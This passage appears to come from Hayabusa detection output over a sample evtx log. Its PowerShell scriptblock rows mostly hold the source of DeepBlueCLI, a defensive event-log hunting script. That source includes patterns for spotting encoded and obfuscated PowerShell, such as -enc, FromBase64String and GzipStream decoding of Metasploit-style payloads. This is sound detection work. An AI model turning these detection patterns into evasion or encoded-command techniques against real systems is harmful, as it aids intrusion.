characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:32:13.804 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:32:14.325 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:33:28.096 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:33:34.598 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:33:34.600 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:33:34.601 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:33:35.043 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:38:42.201 
+00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[3].""#text""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:38:42.204 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:38:45.375 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[4].""#text""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:38:45.376 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:38:48.413 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[5].""#text""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:38:48.416 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:38:51.394 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[6].""#text""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:38:51.396 +00:00,SEC511,4104,info,,PwSh Scriptblock 
Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:17.974 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.563 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.569 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.569 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ 
$events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message 
is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength 
$regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. 
# Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" 
